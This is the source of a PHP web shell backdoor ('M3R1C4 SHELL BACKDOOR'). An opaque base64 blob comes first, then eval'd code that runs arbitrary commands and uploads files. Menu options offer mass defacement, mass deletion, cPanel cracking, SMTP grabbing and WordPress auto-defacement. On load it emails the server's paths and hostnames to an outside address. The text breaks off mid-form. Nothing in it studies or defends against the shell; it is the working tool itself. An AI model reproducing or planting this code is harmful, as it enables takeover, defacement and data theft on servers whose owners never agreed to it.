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';
eval("//M3R1C4 SHELL BACKDOOR V1.0 \r\n//Design By Noval - TCA team\r\n//Greezt : IndoXploit & Ustadcage48\r\n//Keep Calm & Crootz!\r\n\r\n\r\nset_time_limit(0);\r\nerror_reporting(0);\r\n\r\nif(get_magic_quotes_gpc()){\r\nforeach(\$_POST as \$key=>\$value){\r\n\$_POST[\$key] = stripslashes(\$value);\r\n}\r\n}\r\necho '<!doctype html>\r\n<html>\r\n<head>\r\n<title>\$\$ Beby \$\$</title>\r\n</head>';\r\n\r\n?>\r\n<?php\r\n\$kime=\"aqpunk21@gmail.com\";\r\n\$baslik=\"Pesanan Shell datang Cuk !\";\r\n\$spyhackerz=\"Dosya Yolu : \".\$_SERVER['DOCUMENT_ROOT'].\"\\r\\n\";\r\n\$spyhackerz.=\"Server Admin : \".\$_SERVER['SERVER_ADMIN'].\"\\r\\n\";\r\n\$spyhackerz.=\"Server isletim sistemi : \".\$_SERVER['SERVER_SOFTWARE'].\"\\r\\n\";\r\n\$spyhackerz.=\"Shell Link : http://\".\$_SERVER['SERVER_NAME'].\$_SERVER['PHP_SELF'].\"\\r\\n\";\r\n\$spyhackerz.=\"Avlanan Site : \" .\$_SERVER['HTTP_HOST'].\"\\r\\n\";\r\nmail(\$kime, \$baslik, \$spyhackerz);\r\n?>\r\n<style> \r\n@font-face {\r\n font-family: 'Comic Sans MS';\r\n font-style: normal;\r\n font-weight: 400;\r\n src: local('Comic Sans MS'), local('ComicSansMS'), url(http://fonts.gstatic.com/l/font?kit=3oir0CAJ0QJ5h5-A3AP8rRSrmRvs-bRaaQbSAUyiv7A&skey=a4ba60ff9fc73cf8&v=v8) format('truetype');\r\n}\r\nbody {\r\n\t\r\n background: black url(\"data:image/gif;base64,R0lGODlhMgAqAPMLABcXFyYmJjAwMB0dHSAgIBoaGhkZGRQUFCQkJBwcHAAAAP///wAAAAAAAAAAAAAAACH5BAQKAAAAIf4DRzQ0ACH/C05FVFNDQVBFMi4wAwEAAAAsAAAAADIAKgAABP5QyUmrvTjbk44sSCElycR5CoKY3Re6onJK6mQot0LoUynduZQNJ9nteEfgZDVS+FZMZ09Kmz6FQmbJhyXmjNMfsSr+8pDlJQsFiiUCAMksJRjIW4o27I5CCDSAgYKDhIWBNSNcc3oyeHMkE4yPXF1UXkVnSpdNmEljlpVcW1VaVKOcWU2iFFGWmmCbmpawslx+dk5wfHuNKI+6eS+9IwGGxsfIyRiTS1GQuylRc4vCc7WsFFyyUZqvmWOnoK2rtlaqpOeb4tlDQdxj3p45v3F0uG/1c7fQ1DEcygADCswgCc+zYDEKojg4DQ8jWp+4wIIYRBu8MbCgpLOkMZWUVYHpTnWkGAaNyWtpNsFSSKweI5a58jly2GqgzZvGGOJBNKwnT2bQeLr69C7HtnYlj5YM58wUR3OomLJL2aUbUaSolMYMWoffzq498XHFSbasoIMw9UVJu1ManlnfjF7tlFIrSo+npKL7uLEpyJMX3U0gqa5oS14N+4BlqxjXP7PHIgAAIfkEBQoACwAsAQABADAAKAAABP4wJUURUivrvdRJXChuikRNlHJRhmKErguXo3imajqBXEn3v1rGR6ykWq8ecsYTakoBgLN3mFqv2Kx2y918DpQCokD5VlYKMdmTALPdltSXtBQaYXVSjiV77mA7KReAQU97Pk0deSN3Sn16aEgJUWVtYWOVcAIDl2tmbxWbXaOkpVcqaHMhYllncpYlKJGPTwQYWIK3erI6hUODuI27RnxJJLatwoYTCJtlpiTNnG/Q1dbXCxMiJpknKGljrS03TLrLKbYErd/aQO3DRgjiveXlFOlZsJNTHtj+/wBXheuhxtsrNwXmGbNyoxgec4QS8Svyp8c7G4smfsuoCCIVWD4FoQDodIIStYAoU17BBCpWipAftLRUg8+dxxgLh/h4OC7dBXk2I9azSORnzWE8h9KhFeLTpJHgPEl00i1qBAAh+QQFCgALACwBAAEAMAAoAAAE/rCgsqq9OOudEVIEqCgGOSqJko3fSnCa8n1oPaarrGI6zIchU+m2u7CKFpBvyWw6n9CodErFHBKHW2okKWhP16zMd1yVhrXcVnhCwMq81BrHs9XWbg7ceD7RjXZ9e08KVxtdNwEAI2EsVY+QkU2NhVgsNJUxiCh/ZIKCOiNnLiJEoiR6ckR4figrM62rep8mR6cGpEGBJAkBMZSUCAIDjAmSx8jJVV1LCcZSQrlmta7Qcq9jcXadS6WjP0o8oM/K5ebn6BdrhiuUmx5Ib3a7uOKodS1MpvvX2uRJPfTNW/ONzz1A+ZR5qSTmnYB0ECNWKCbGWbwFMjBRskgozLiLIIMm0tNnQBWRHAkBzqlmBNadjyhBjnRiCYUiFsPMhYkAACH5BAUKAAsALAEAAQAwACgAAAT+MCW1ql0F3c2XUlonftOnlAqRcorRsiAlbqR5mgjITgmcz7SbCaUisFwGH3DJbDqf0Kh02vwcEodPpvBB/JhYEmqrRXAV14OLWmm5a5/iscVj31CoXOhyX9uRQyZyNEhpZWcIAmwdW4uOj5CRCgVVXjJObzcsRYE+JoBdQDUsep1BOTV5opo0nKOnn5l6UFmTj4mRubq7OyhpUDpUr3wqTF2XlaZ8s6tfmCrDFinIIzG8T3vX2tsbYWjehiDZ0uHhllZYfH7N1B6goDEfSHwTxtY0PKk4gT3S6zPH5rhwMzAewUQD0NUq5w0XC4a1EFrhRrGixYsYM+5KQQaEoosDZiIAADs=\");\r\nline-height: 1;color: #fff;font-family: Comic Sans MS ;\r\n \r\n }\r\n \r\ntable, th, td {\r\n\tborder-collapse:collapse;\r\n\tbackground: transparent;\r\n\tfont-family: Comic Sans MS ;\r\n\tfont-size: 13px;\r\n}\r\ninput, textarea { font-family: Comic Sans MS ; }\r\n.table_home, .th_home, .td_home { color:grey;\r\n\tborder: 1px solid grey;\r\n}\r\nth {\r\n\tpadding: 10px;\r\n}\r\n.td_home { padding: 7px; }\r\nselect {font-family: Comic Sans MS }\r\na {color:white}\r\ntextarea { width: 100%;height: 400px; }\r\n</style>\r\n<?php\r\n\r\necho '</head>\r\n<body><b>\r\n<H1><center>M3R1C4 <font color=\"red\">SHELL BACKDOOR</font> <font color=\"dodgerblue\">V1.0</font></center></h1>\r\n<table width=\"700\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">\r\n\r\n<tr><td>\r\n\r\n<font color=\"green\"><center>'.php_uname().'</center></font><br>';\r\nif(isset(\$_GET['path'])){\r\n\$path = \$_GET['path'];\r\n}else{\r\n\$path = \r\ngetcwd();\r\n}\r\n\$path = str_replace('\\\\','/',\$path);\r\n\$paths = explode('/',\$path);\r\n\r\nforeach(\$paths as \$id=>\$pat){\r\nif(\$pat == '' && \$id == 0){\r\n\$a = true;\r\necho '<font color=#fff><center>Current DIR:<a href=\"?path=/\">/</a>';\r\ncontinue;\r\n}\r\nif(\$pat == '') continue;\r\necho '<a href=\"?path=';\r\nfor(\$i=0;\$i<=\$id;\$i++){\r\necho \"\$paths[\$i]\";\r\nif(\$i != \$id) echo \"/\";\r\n}\r\necho '\">'.\$pat.'</a>/';\r\n}\r\necho \"<hr>\";\r\necho \"<right>\";\r\necho \"<ul>\";\r\necho \"<li><a href='?'>Home</a></li>\";\r\necho \"<li><a href='?dir=\$dir&do=cmd'>Command</a></li>\";\r\necho \"<li><a href='?dir=\$dir&do=mass_deface'>Mass Deface</a></li>\";\r\necho \"<li><a href='?dir=\$dir&do=mass_delete'>Mass Delete</a></li>\";\r\necho \"<li><a href='?dir=\$dir&do=config'>Config</a></li>\";\r\necho \"<li><a href='?dir=\$dir&do=jumping'>Jumping</a></li>\";\r\necho \"<li><a href='?dir=\$dir&do=cpanel'>CPanel Crack</a></li>\";\r\necho \"<li><a href='?dir=\$dir&do=smtp'>SMTP Grabber</a></li>\";\r\necho \"<li><a href='?dir=\$dir&do=zoneh'>Zone-H</a></li>\";\r\necho \"<li><a href='?dir=\$dir&do=cgi'>CGI Telnet</a></li>\";\r\necho \"<li><a href='?dir=\$dir&do=network'>network</a></li>\";\r\necho \"<li><a href='?dir=\$dir&do=adminer'>Adminer</a></li><br>\";\r\necho \"<li><a href='?dir=\$dir&do=fake_root'>Fake Root</a></li>\";\r\necho \"<li><a href='?dir=\$dir&do=auto_edit_user'>Auto Edit User</a></li>\";\r\necho \"<li><a href='?dir=\$dir&do=auto_wp'>Auto Edit Title WordPress</a></li>\";\r\necho \"<li><a href='?dir=\$dir&do=auto_dwp'>WordPress Auto Deface</a></li>\";\r\necho \"<li><a href='?dir=\$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a></li>\";\r\necho \"<li><a href='?dir=\$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a></li>\";\r\necho \"</ul>\";\r\necho \"</right>\";\r\necho \"<hr>\";\r\nif(\$_GET['do'] == 'upload') {\r\n\techo \"<center>\";\r\n\tif(\$_POST['upload']) {\r\n\t\tif(@copy(\$_FILES['ix_file']['tmp_name'], \"\$dir/\".\$_FILES['ix_file']['name'].\"\")) {\r\n\t\t\t\$act = \"<font color=lime>Uploaded!</font> at <i><b>\$dir/\".\$_FILES['ix_file']['name'].\"</b></i>\";\r\n\t\t} else {\r\n\t\t\t\$act = \"<font color=red>failed to upload file</font>\";\r\n\t\t}\r\n\t}\r\n\techo \"Upload File: [ \".w(\$dir,\"Writeable\").\" ]<form method='post' enctype='multipart/form-data'><input type='file' name='ix_file'><input type='submit' value='upload' name='upload'></form>\";\r\n\techo \$act;\r\n\techo \"</center>\";\r\n} elseif(\$_GET['do'] == 'cmd') {\r\n\techo \"<form method='post'>\r\n\t<font style='text-decoration: underline;'>\".\$user.\"@\".gethostbyname(\$_SERVER['HTTP_HOST']).\":~# </font>\r\n\t<input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>\r\n\t</form>\";\r\n\tif(\$_POST['do_cmd']) {\r\n\t\techo \"<pre>\".exe(\$_POST['cmd']).\"</pre>\";\r\n\t}\r\n} elseif(\$_GET['do'] == 'mass_deface') {\r\n\tfunction sabun_massal(\$dir,\$namafile,\$isi_script) {\r\n\t\tif(is_writable(\$dir)) {\r\n\t\t\t\$dira = scandir(\$dir);\r\n\t\t\tforeach(\$dira as \$dirb) {\r\n\t\t\t\t\$dirc = \"\$dir/\$dirb\";\r\n\t\t\t\t\$lokasi = \$dirc.'/'.\$namafile;\r\n\t\t\t\tif(\$dirb === '.') {\r\n\t\t\t\t\tfile_put_contents(\$lokasi, \$isi_script);\r\n\t\t\t\t} elseif(\$dirb === '..') {\r\n\t\t\t\t\tfile_put_contents(\$lokasi, \$isi_script);\r\n\t\t\t\t} else {\r\n\t\t\t\t\tif(is_dir(\$dirc)) {\r\n\t\t\t\t\t\tif(is_writable(\$dirc)) {\r\n\t\t\t\t\t\t\techo \"[<font color=lime>DONE</font>] \$lokasi<br>\";\r\n\t\t\t\t\t\t\tfile_put_contents(\$lokasi, \$isi_script);\r\n\t\t\t\t\t\t\t\$idx = sabun_massal(\$dirc,\$namafile,\$isi_script);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tfunction sabun_biasa(\$dir,\$namafile,\$isi_script) {\r\n\t\tif(is_writable(\$dir)) {\r\n\t\t\t\$dira = scandir(\$dir);\r\n\t\t\tforeach(\$dira as \$dirb) {\r\n\t\t\t\t\$dirc = \"\$dir/\$dirb\";\r\n\t\t\t\t\$lokasi = \$dirc.'/'.\$namafile;\r\n\t\t\t\tif(\$dirb === '.') {\r\n\t\t\t\t\tfile_put_contents(\$lokasi, \$isi_script);\r\n\t\t\t\t} elseif(\$dirb === '..') {\r\n\t\t\t\t\tfile_put_contents(\$lokasi, \$isi_script);\r\n\t\t\t\t} else {\r\n\t\t\t\t\tif(is_dir(\$dirc)) {\r\n\t\t\t\t\t\tif(is_writable(\$dirc)) {\r\n\t\t\t\t\t\t\techo \"[<font color=lime>DONE</font>] \$lokasi<br>\";\r\n\t\t\t\t\t\t\tfile_put_contents(\$lokasi, \$isi_script);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tif(\$_POST['start']) {\r\n\t\tif(\$_POST['tipe_sabun'] == 'mahal') {\r\n\t\t\techo \"<div style='margin: 5px auto; padding: 5px'>\";\r\n\t\t\tsabun_massal(\$_POST['d_dir'], \$_POST['d_file'], \$_POST['script']);\r\n\t\t\techo \"</div>\";\r\n\t\t} elseif(\$_POST['tipe_sabun'] == 'murah') {\r\n\t\t\techo \"<div style='margin: 5px auto; padding: 5px'>\";\r\n\t\t\tsabun_biasa(\$_POST['d_dir'], \$_POST['d_file'], \$_POST['script']);\r\n\t\t\techo \"</div>\";\r\n\t\t}\r\n\t} else {\r\n\techo \"<center>\";\r\n\techo \"<form method='post'>\r\n\t<font style='text-decoration: underline;'>Tipe Sabun:</font><br>\r\n\t<input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>\r\n\t<font style='text-decoration: underline;'>Folder:</font><br>\r\n\t<input type='text' name='d_dir' value='\$dir' style='width: 450px;' height='10'><br>\r\n\t<font style='text-decoration: underline;'>Filename:</font><br>\r\n\t<input type='text' name='d_file' 